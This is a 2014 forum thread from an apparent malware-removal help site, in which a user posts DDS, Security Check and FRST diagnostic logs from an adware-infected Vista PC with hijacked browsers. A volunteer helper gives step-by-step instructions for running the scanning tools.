Multiple Infections. Computer Barely Usable.


  • This topic is locked
27 replies to this topic

#1 topper8281

  • Members
  • 33 posts

Posted 28 October 2014 - 03:59 PM

Hey guys. I'm working on the computer of a friend of mine right now. It seems to have several problems with malware and viruses, though I don't know exactly which ones. I scanned with Malwarebytes and quarantined a bunch of files. Subsequent scans with Malwarebytes, Windows Defender, and Avast say there is nothing wrong, but I know this isn't true. Firefox and Google Chrome have both been hijacked and I can only really browse the net now with Opera. There are constant fake security notifications the moment either of those browsers is opened. There are also many unwanted browser add-ons installed to them.

 

I've pasted in the information from the DDS file, and attached the attach.txt file (EDIT: I guess I wasn't supposed to add this. But the actual program gave conflicting information) to this post. Any help is appreciated here guys.

 

DDS (Ver_2012-11-20.01) - NTFS_x86
Internet Explorer: 7.0.6002.18005
Run by Nick at 13:45:30 on 2014-10-28
#Option MBR scan  is disabled.
Microsoft® Windows Vista™ Ultimate   6.0.6002.2.1252.1.1033.18.2045.1142 [GMT -7:00]
.
AV: avast! Antivirus *Enabled/Updated* {17AD7D40-BA12-9C46-7131-94903A54AD8B}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: avast! Antivirus *Enabled/Updated* {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
.
============== Running Processes ================
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\LogonUI.exe
C:\Windows\system32\SLsvc.exe
C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
C:\Windows\System32\spoolsv.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Windows\system32\rundll32.exe
C:\Program Files\LogMeIn Hamachi\hamachi-2.exe
C:\Program Files\uvnc bvba\UltraVNC\WinVNC.exe
C:\Windows\system32\SearchIndexer.exe
C:\Program Files\uvnc bvba\UltraVNC\WinVNC.exe
C:\Windows\system32\taskeng.exe
C:\Program Files\Google\Update\GoogleUpdate.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\rdpclip.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Windows Defender\MSASCui.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Program Files\Alwil Software\Avast5\AvastUI.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Users\Nick\AppData\Local\Google\Update\GoogleUpdate.exe
C:\Users\Nick\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
C:\Program Files\McAfee Security Scan\3.0.285\SSScheduler.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\logon.scr
C:\Program Files\Opera\opera.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k rpcss
C:\Windows\System32\svchost.exe -k secsvcs
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.bing.com/?pc=Z016&form=ZGAPHP
mStart Page = hxxps://www.yahoo.com?fr=hp-avast&type=odc268
mSearch Bar = hxxps://www.yahoo.com?fr=hp-avast&type=odc268
mSearch Page = hxxps://search.yahoo.com/yhs/search?type=odc268&hspart=avast&hsimp=yhs-001&p={searchTerms}
BHO: Adobe PDF Link Helper: {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - c:\program files\common files\adobe\acrobat\activex\AcroIEHelperShim.dll
BHO: RealNetworks Download and Record Plugin for Internet Explorer: {3049C3E9-B461-4BC5-8870-4C09146192CA} - c:\programdata\realnetworks\realdownloader\browserplugins\ie\rndlbrowserrecordplugin.dll
BHO: {626F3344-6A64-3995-E8E7-11D63F841162} - <orphaned>
BHO: {6D5C04CD-A77C-BAB9-6494-57DA426BB009} - <orphaned>
BHO: avast! Online Security: {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - c:\program files\alwil software\avast5\aswWebRepIE.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - c:\program files\common files\microsoft shared\windows live\WindowsLiveLogin.dll
BHO: Windows Live Messenger Companion Helper: {9FDDE16B-836F-4806-AB1F-1455CBEFF289} - c:\program files\windows live\companion\companioncore.dll
uRun: [googletalk] c:\users\nick\appdata\roaming\google\google talk\googletalk.exe /autostart
uRun: [AdobeBridge] <no file>
mRun: [Windows Defender] c:\program files\windows defender\MSASCui.exe -hide
mRun: [Adobe Reader Speed Launcher] "c:\program files\adobe\reader 10.0\reader\Reader_sl.exe"
mRun: [Adobe ARM] "c:\program files\common files\adobe\arm\1.0\AdobeARM.exe"
mRun: [APSDaemon] "c:\program files\common files\apple\apple application support\APSDaemon.exe"
mRun: [AdobeAAMUpdater-1.0] "c:\program files\common files\adobe\oobe\pdapp\uwa\UpdaterStartupUtility.exe"
mRun: [SwitchBoard] c:\program files\common files\adobe\switchboard\SwitchBoard.exe
mRun: [AdobeCS6ServiceManager] "c:\program files\common files\adobe\cs6servicemanager\CS6ServiceManager.exe" -launchedbylogin
mRun: [QuickTime Task] "c:\program files\quicktime\QTTask.exe" -atboottime
mRun: [SunJavaUpdateSched] "c:\program files\common files\java\java update\jusched.exe"
mRun: [AvastUI.exe] "c:\program files\alwil software\avast5\AvastUI.exe" /nogui
mRun: [iTunesHelper] "c:\program files\itunes\iTunesHelper.exe"
StartupFolder: c:\progra~2\micros~1\windows\startm~1\programs\startup\mcafee~1.lnk - c:\program files\mcafee security scan\3.0.285\SSScheduler.exe
mPolicies-Explorer: BindDirectlyToPropertySetStorage = dword:0
mPolicies-System: EnableUIADesktopToggle = dword:0
mPolicies-System: LocalAccountTokenFilterPolicy = dword:1
mPolicies-System: SoftwareSASGeneration = dword:1
IE: {0000036B-C524-4050-81A0-243669A86B9F} - {B63DBA5F-523F-4B9C-A43D-65DF1977EAD3} - c:\program files\windows live\companion\companioncore.dll
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - c:\program files\windows live\writer\WriterBrowserExtension.dll
TCP: NameServer = 192.168.1.1
TCP: Interfaces\{9B9BDB42-202D-4CEB-B010-E5C03725FE0C} : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{CE09BE28-75F0-40B1-8170-1BEE2B43FEDA} : DHCPNameServer = 184.16.4.22 184.16.33.54
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - c:\program files\windows live\photo gallery\AlbumDownloadProtocolHandler.dll
AppInit_DLLs= c:\progra~1\searchprotect\searchprotect\bin\spvc32loader.dll c:\progra~1\optimi~1\optpro~2.dll
LSA: Security Packages =  kerberos msv1_0 schannel wdigest tspkg
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "c:\program files\google\chrome\application\35.0.1916.153\installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
.
================= FIREFOX ===================
.
FF - ProfilePath - c:\users\nick\appdata\roaming\mozilla\firefox\profiles\ghs5oui9.default\
FF - prefs.js: browser.startup.homepage - hxxp://www.google.com/
FF - prefs.js: network.proxy.type - 0
FF - plugin: c:\program files\common files\adobe\oobe\pdapp\ccm\utilities\npAdobeAAMDetect32.dll
FF - plugin: c:\program files\common files\adobe\oobe\pdapp\ccm\utilities\npAdobeAAMDetect64.dll
FF - plugin: c:\program files\google\update\1.3.24.15\npGoogleUpdate3.dll
FF - plugin: c:\program files\microsoft silverlight\5.1.30514.0\npctrlui.dll
FF - plugin: c:\program files\pando networks\media booster\npPandoWebPlugin.dll
FF - plugin: c:\program files\real\realplayer\netscape6\nprpplugin.dll
FF - plugin: c:\program files\windows live\photo gallery\NPWLPG.dll
FF - plugin: c:\programdata\realnetworks\realdownloader\browserplugins\mozillaplugins\nprndlchromebrowserrecordext.dll
FF - plugin: c:\programdata\realnetworks\realdownloader\browserplugins\mozillaplugins\nprndlhtml5videoshim.dll
FF - plugin: c:\programdata\realnetworks\realdownloader\browserplugins\mozillaplugins\nprndlpepperflashvideoshim.dll
FF - plugin: c:\programdata\realnetworks\realdownloader\browserplugins\npdlplugin.dll
FF - plugin: c:\users\nick\appdata\local\google\update\1.3.24.7\npGoogleUpdate3.dll
FF - plugin: c:\users\nick\appdata\roaming\mozilla\firefox\profiles\ghs5oui9.default\extensions\logmeinclient@logmein.com\plugins\npRACtrl.dll
FF - plugin: c:\users\nick\appdata\roaming\mozilla\plugins\npgoogletalk.dll
FF - plugin: c:\users\nick\appdata\roaming\mozilla\plugins\npo1d.dll
FF - plugin: c:\windows\system32\macromed\flash\NPSWF32_15_0_0_189.dll
FF - ExtSQL: !HIDDEN! 2010-11-21 19:35; {20a82645-c095-46ed-80e3-08825760534b}; c:\windows\microsoft.net\framework\v3.5\windows presentation foundation\DotNetAssistantExtension
.
============= SERVICES / DRIVERS ===============
.
R0 aswRvrt;avast! Revert;c:\windows\system32\drivers\aswRvrt.sys [2013-9-7 49944]
R0 aswVmm;avast! VM Monitor;c:\windows\system32\drivers\aswVmm.sys [2013-9-7 206248]
R1 aswSnx;aswSnx;c:\windows\system32\drivers\aswSnx.sys [2011-7-7 787800]
R1 aswSP;aswSP;c:\windows\system32\drivers\aswsp.sys [2010-11-20 422760]
R1 dtsoftbus01;DAEMON Tools Virtual Bus Driver;c:\windows\system32\drivers\dtsoftbus01.sys [2012-10-5 242240]
R2 aswHwid;avast! HardwareID;c:\windows\system32\drivers\aswHwid.sys [2014-8-1 24184]
R2 aswMonFlt;aswMonFlt;c:\windows\system32\drivers\aswMonFlt.sys [2010-11-20 70384]
R2 avast! Antivirus;avast! Antivirus;c:\program files\alwil software\avast5\AvastSvc.exe [2011-1-17 50344]
R2 ca82e1a5;Optimizer Pro Crash Monitor;c:\windows\system32\rundll32.exe [2006-11-2 44544]
R2 FontCache;Windows Font Cache Service;c:\windows\system32\svchost.exe -k LocalServiceAndNoImpersonation [2010-11-25 21504]
R2 Hamachi2Svc;LogMeIn Hamachi Tunneling Engine;c:\program files\logmein hamachi\hamachi-2.exe [2013-6-28 1440080]
R2 uvnc_service;uvnc_service;c:\program files\uvnc bvba\ultravnc\winvnc.exe [2014-10-28 1795864]
R3 b57nd60x;%SvcDispName%;c:\windows\system32\drivers\b57nd60x.sys [2010-11-25 179712]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe [2013-9-11 105144]
S3 fssfltr;FssFltr;c:\windows\system32\drivers\fssfltr.sys [2013-4-14 39272]
S3 fsssvc;Windows Live Family Safety Service;c:\program files\windows live\family safety\fsssvc.exe [2012-3-8 1492840]
S3 massfilter_hs;ZTE HandSet Mass Storage Filter Driver;c:\windows\system32\drivers\massfilter_hs.sys [2012-5-25 9216]
S3 McComponentHostService;McAfee Security Scan Component Host Service;c:\program files\mcafee security scan\3.0.285\McCHSvc.exe [2012-9-5 234776]
S3 RealNetworks Downloader Resolver Service;RealNetworks Downloader Resolver Service;c:\program files\realnetworks\realdownloader\rndlresolversvc.exe [2012-11-29 38608]
S3 SwitchBoard;Adobe SwitchBoard;c:\program files\common files\adobe\switchboard\SwitchBoard.exe [2010-2-19 517096]
S3 TeamViewer8;TeamViewer 8;c:\program files\teamviewer\version8\TeamViewer_Service.exe [2012-12-24 4153184]
S3 WPFFontCache_v0400;Windows Presentation Foundation Font Cache 4.0.0.0;c:\windows\microsoft.net\framework\v4.0.30319\wpf\WPFFontCache_v0400.exe [2013-9-11 770168]
S3 zghsdiag;ZTE General Handset Diagnostic Port;c:\windows\system32\drivers\zghsdiag.sys [2012-5-25 106752]
S3 zghsmdm;ZTE General Handset USB Modem Proprietary;c:\windows\system32\drivers\zghsmdm.sys [2012-5-25 106752]
S3 zghsnmea;ZTE General Handset NMEA Port;c:\windows\system32\drivers\zghsnmea.sys [2012-5-25 106752]
S4 Futuremark SystemInfo Service;Futuremark SystemInfo Service;c:\program files\futuremark\futuremark systeminfo\FMSISvc.exe [2012-1-20 135584]
S4 wlcrasvc;Windows Live Mesh remote connections service;c:\program files\windows live\mesh\wlcrasvc.exe [2010-9-22 51040]
.
=============== Created Last 30 ================
.
2014-10-28 19:23:32    --------    d-----w-    c:\users\nick\appdata\roaming\UltraVNC
2014-10-28 19:14:02    --------    d-----w-    c:\program files\uvnc bvba
2014-10-28 08:57:01    8901368    ----a-w-    c:\programdata\microsoft\windows defender\definition updates\{40b871f3-e229-47e5-afc8-5375605cc10b}\mpengine.dll
2014-10-27 04:28:36    43152    ----a-w-    c:\windows\avastSS.scr
2014-10-27 02:59:15    114904    ----a-w-    c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-10-27 02:56:50    --------    d-----w-    c:\programdata\McAfee Security Scan
2014-10-27 02:56:45    --------    d-----w-    c:\program files\McAfee Security Scan
2014-10-21 10:17:06    81560    ----a-w-    c:\windows\system32\mscories.dll
2014-10-21 10:17:06    156824    ----a-w-    c:\windows\system32\mscorier.dll
2014-10-21 10:17:05    1131664    ----a-w-    c:\windows\system32\dfshim.dll
2014-10-21 10:15:59    389632    ----a-w-    c:\windows\system32\html.iec
2014-10-21 10:15:59    304128    ----a-w-    c:\program files\internet explorer\ieuser.exe
2014-10-21 10:15:58    1827328    ----a-w-    c:\windows\system32\inetcpl.cpl
2014-10-21 10:13:19    2054656    ----a-w-    c:\windows\system32\win32k.sys
2014-10-21 10:03:31    143360    ----a-w-    c:\windows\system32\drivers\fastfat.sys
2014-10-21 10:00:33    66560    ----a-w-    c:\windows\system32\packager.dll
2014-10-14 00:53:01    --------    d-----w-    c:\programdata\SaalesCheckEr
2014-09-30 10:01:03    2048    ----a-w-    c:\windows\system32\tzres.dll
.
==================== Find3M  ====================
.
2014-10-27 04:28:37    70384    ----a-w-    c:\windows\system32\drivers\aswMonFlt.sys
2014-10-27 04:28:37    49944    ----a-w-    c:\windows\system32\drivers\aswRvrt.sys
2014-10-27 04:28:37    24184    ----a-w-    c:\windows\system32\drivers\aswHwid.sys
2014-10-27 04:28:37    206248    ----a-w-    c:\windows\system32\drivers\aswVmm.sys
2014-10-27 04:28:17    787800    ----a-w-    c:\windows\system32\drivers\aswSnx.sys
2014-10-27 02:56:42    71344    ----a-w-    c:\windows\system32\FlashPlayerCPLApp.cpl
2014-10-27 02:56:42    701104    ----a-w-    c:\windows\system32\FlashPlayerApp.exe
2014-10-02 22:53:02    231568    ------w-    c:\windows\system32\MpSigStub.exe
2014-10-01 18:11:20    51928    ----a-w-    c:\windows\system32\drivers\mwac.sys
2014-10-01 18:11:14    75480    ----a-w-    c:\windows\system32\drivers\mbamchameleon.sys
2014-10-01 18:11:10    23256    ----a-w-    c:\windows\system32\drivers\mbam.sys
2014-09-23 23:37:56    834048    ----a-w-    c:\windows\system32\wininet.dll
2014-09-23 23:37:02    53760    ----a-w-    c:\windows\apppatch\iebrshim.dll
2014-09-23 23:36:47    19968    ----a-w-    c:\windows\system32\corpol.dll
2014-09-23 22:27:01    1383424    ----a-w-    c:\windows\system32\mshtml.tlb
2014-08-25 08:04:52    18872    ----a-w-    c:\windows\system32\drivers\SPPD.sys
2014-08-23 01:03:46    297984    ----a-w-    c:\windows\system32\gdi32.dll
2005-01-20 02:35:44    513024    ----a-w-    c:\program files\zsnesw.exe
.
============= FINISH: 13:46:22.73 ===============
 

Edited by topper8281, 28 October 2014 - 06:43 PM.




#2 Jo*

  • Malware Response Team
  • 3,319 posts

Posted 01 November 2014 - 09:17 AM


Hello topper8281,

my name is Jo and I will help you with your computer problems.


Please follow these guidelines:
  • Logs can take a while to research, so please be patient.
  • Read and follow the instructions in the sequence they are posted.
  • Print or copy & save instructions.
  • Back up all your private data / important files on another (external) drive before using our tools.
  • Do not install / uninstall any applications, unless otherwise instructed.
  • Use only the tools you have been instructed to use.
  • Copy and Paste the log files inside your post, unless otherwise instructed.
  • Ask for clarification, if you have any questions.
  • Stay with this topic until you get the all-clean post.
  • My first language is not English. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.

***


1. Download Security Check by screen317 from here or here.
  • Save it to your Desktop.
  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
    Vista / Windows 7/8 users right-click and select Run As Administrator.
  • A Notepad document should open automatically called checkup.txt; please post the contents of that document.

***


2. Please download Farbar Recovery Scan Tool and save it to your Desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system, download both of them and try to run them. Only one of them will run on your system; that will be the right version.
  • Right-click FRST / FRST64 then click "Run as administrator" (XP users: click run after receipt of Windows Security Warning - Open File).
  • When the tool opens, click Yes to disclaimer.
  • Press the Scan button.
  • When finished, it will produce a log called FRST.txt in the same directory the tool was run from.
  • Please copy and paste the log in your next reply.
Note 2: The first time the tool is run it generates another log (Addition.txt - also located in the same directory the tool was run from). Please also paste that, along with the FRST.txt into your next reply.



***


Graduate of the WTT Classroom
Cheers,
Jo
If I have been helping you, and I have not replied to your latest post in 36 hours please send me a PM.


#3 topper8281

  • Topic Starter
  • Members
  • 33 posts

Posted 01 November 2014 - 12:12 PM

Okay. Here are the logs you requested. I had to temporarily disable Avast Antivirus to get FRST to work, but then it did just fine.

 

 Results of screen317's Security Check version 0.99.89  
 Windows Vista Service Pack 2 x86 (UAC is enabled)  
 Internet Explorer 7 Out of date!
``````````````Antivirus/Firewall Check:``````````````
 Windows Firewall Enabled!  
avast! Antivirus   
 Antivirus up to date!   
`````````Anti-malware/Other Utilities Check:`````````
 Adobe Flash Player     15.0.0.189  
 Mozilla Firefox (33.0)
 Google Chrome 35.0.1916.114  
 Google Chrome 35.0.1916.153  
 Google Chrome update.dll..  
````````Process Check: objlist.exe by Laurent````````  
 Windows Defender MSASCui.exe
 Windows Defender MSASCui.exe   
 Alwil Software Avast5 AvastSvc.exe  
 Alwil Software Avast5 AvastUI.exe  
`````````````````System Health check`````````````````
 Total Fragmentation on Drive C: 0 %
````````````````````End of Log``````````````````````
 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 01-11-2014
Ran by Nick (administrator) on WALKER-PC on 01-11-2014 10:08:01
Running from C:\Users\Nick\Desktop
Loaded Profiles: Nick & Bill (Available profiles: Kristi & Hannah & Nick & Bill & UpdatusUser & Dylan & Administrator)
Platform: Microsoft® Windows Vista™ Ultimate  Service Pack 2 (X86) OS Language: English (United States)
Internet Explorer Version 7
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(AVAST Software) C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(LogMeIn Inc.) C:\Program Files\LogMeIn Hamachi\hamachi-2.exe
(UltraVNC) C:\Program Files\uvnc bvba\UltraVNC\winvnc.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCui.exe
(Oracle Corporation) C:\Program Files\Common Files\Java\Java Update\jusched.exe
(AVAST Software) C:\Program Files\Alwil Software\Avast5\AvastUI.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(Spotify Ltd) C:\Users\Nick\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.0.285\SSScheduler.exe
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(Microsoft Corporation) C:\Windows\System32\LogonUI.exe
(UltraVNC) C:\Program Files\uvnc bvba\UltraVNC\winvnc.exe
(Microsoft Corporation) C:\Windows\System32\rdpclip.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCui.exe
(Oracle Corporation) C:\Program Files\Common Files\Java\Java Update\jusched.exe
(AVAST Software) C:\Program Files\Alwil Software\Avast5\AvastUI.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Google Inc.) C:\Users\Nick\AppData\Local\Google\Update\GoogleUpdate.exe
(Spotify Ltd) C:\Users\Nick\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.0.285\SSScheduler.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(Opera Software) C:\Program Files\Opera\opera.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [1008184 2008-01-19] (Microsoft Corporation)
HKLM\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files\Adobe\Reader 10.0\Reader\Reader_sl.exe [35736 2010-11-10] (Adobe Systems Incorporated)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [932288 2010-11-10] (Adobe Systems Incorporated)
HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-04-23] (Apple Inc.)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [444904 2012-09-20] (Adobe Systems Incorporated)
HKLM\...\Run: [SwitchBoard] => C:\Program Files\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKLM\...\Run: [AdobeCS6ServiceManager] => C:\Program Files\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2013-05-01] (Apple Inc.)
HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [254336 2013-07-02] (Oracle Corporation)
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\Alwil Software\Avast5\AvastUI.exe [5223016 2014-10-26] (AVAST Software)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [152392 2014-05-26] (Apple Inc.)
HKU\S-1-5-19\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
HKU\S-1-5-20\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\Run: [googletalk] => C:\Users\Nick\AppData\Roaming\Google\Google Talk\googletalk.exe [3739648 2007-01-01] (Google)
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\Run: [Google Update] => C:\Users\Nick\AppData\Local\Google\Update\GoogleUpdate.exe [116648 2013-04-10] (Google Inc.)
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\Run: [Spotify Web Helper] => C:\Users\Nick\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe [1140736 2014-05-03] (Spotify Ltd)
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\MountPoints2: G - G:\sources\sperr32.exe x64
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\MountPoints2: {b1134796-9622-11e0-9898-0040f4e8e5d1} - F:\noautorun.exe
HKU\S-1-5-21-2927482541-673307907-4085399872-1004\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-19] (Microsoft Corporation)
HKU\S-1-5-21-2927482541-673307907-4085399872-1004\...\Run: [googletalk] => C:\Users\Bill\AppData\Roaming\Google\Google Talk\googletalk.exe /autostart
HKU\S-1-5-21-2927482541-673307907-4085399872-1004\...\Run: [EA Core] => "C:\Program Files\Electronic Arts\EADM\Core.exe" -silent
HKU\S-1-5-21-2927482541-673307907-4085399872-1004\...\Run: [WMPNSCFG] => C:\Program Files\Windows Media Player\WMPNSCFG.exe [202240 2008-01-19] (Microsoft Corporation)
HKU\S-1-5-21-2927482541-673307907-4085399872-1004\...\Run: [PhotoJoy] => C:\Program Files\PhotoJoy\bin\PhotoJoy.exe /c
HKU\S-1-5-21-2927482541-673307907-4085399872-1004\...\Run: [Desktop Software] => C:\Program Files\Common Files\SupportSoft\bin\bcont.exe [1025320 2009-04-24] (SupportSoft, Inc.)
HKU\S-1-5-21-2927482541-673307907-4085399872-1004\...\Run: [Spotify Web Helper] => C:\Users\Nick\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe [1140736 2014-05-03] (Spotify Ltd)
HKU\S-1-5-21-2927482541-673307907-4085399872-1004\...\Run: [HotkeyP] => C:\Users\Bill\Desktop\Dylan\hotkeyp\HotkeyP.exe 0
HKU\S-1-5-21-2927482541-673307907-4085399872-1004\...\MountPoints2: G - G:\SetUp.exe
HKU\S-1-5-21-2927482541-673307907-4085399872-1004\...\MountPoints2: {99a19f3c-9787-11e0-9a49-0040f4e8e5d1} - G:\LaunchU3.exe -a
HKU\S-1-5-21-2927482541-673307907-4085399872-1004\...\MountPoints2: {a4f858c4-f51d-11df-9bdb-806e6f6e6963} - D:\RunGame.exe
HKU\S-1-5-21-2927482541-673307907-4085399872-1004\...\MountPoints2: {b1134796-9622-11e0-9898-0040f4e8e5d1} - F:\noautorun.exe
AppInit_DLLs: C:\PROGRA~1\SearchProtect\SearchProtect\bin\SPVC32Loader.dll => C:\PROGRA~1\SearchProtect\SearchProtect\bin\SPVC32Loader.dll File Not Found
AppInit_DLLs:  c:\progra~1\optimi~1\optpro~2.dll => c:\Program Files\Optimizer Pro\OptProCrash.dll [3000776 2014-06-15] ()
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.0.285\SSScheduler.exe (McAfee, Inc.)
Startup: C:\Users\Bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\Nick\AppData\Roaming\Dropbox\bin\Dropbox.exe (No File)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\Alwil Software\Avast5\ashShell.dll (AVAST Software)
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File
BootExecute: autocheck autochk * sdnclean.exe
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.bing.com/?pc=Z016&form=ZGAPHP
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.yahoo.com?fr=hp-avast&type=odc268
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = https://search.yahoo.com/yhs/search?type=odc268&hspart=avast&hsimp=yhs-001&p={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = https://www.yahoo.com?fr=hp-avast&type=odc268
SearchScopes: HKLM - DefaultScope {9CB96984-43C3-4D44-90EF-01466EFCF7BB} URL = https://search.yahoo.com/yhs/search?type=odc268&hspart=avast&hsimp=yhs-001&p={searchTerms}
SearchScopes: HKLM - {9CB96984-43C3-4D44-90EF-01466EFCF7BB} URL = https://search.yahoo.com/yhs/search?type=odc268&hspart=avast&hsimp=yhs-001&p={searchTerms}
SearchScopes: HKLM - {afdbddaa-5d3f-42ee-b79c-185a7020515b} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3072253
SearchScopes: HKCU - DefaultScope {AFDBDDAA-5D3F-42EE-B79C-185A7020515B} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3072253
SearchScopes: HKCU - {8A64D544-98BB-C260-590A-335EB1FB0846} URL = http://www.bing.com/search?q={searchTerms}&pc=Z016&form=ZGAIDF
SearchScopes: HKCU - {afdbddaa-5d3f-42ee-b79c-185a7020515b} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3072253
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
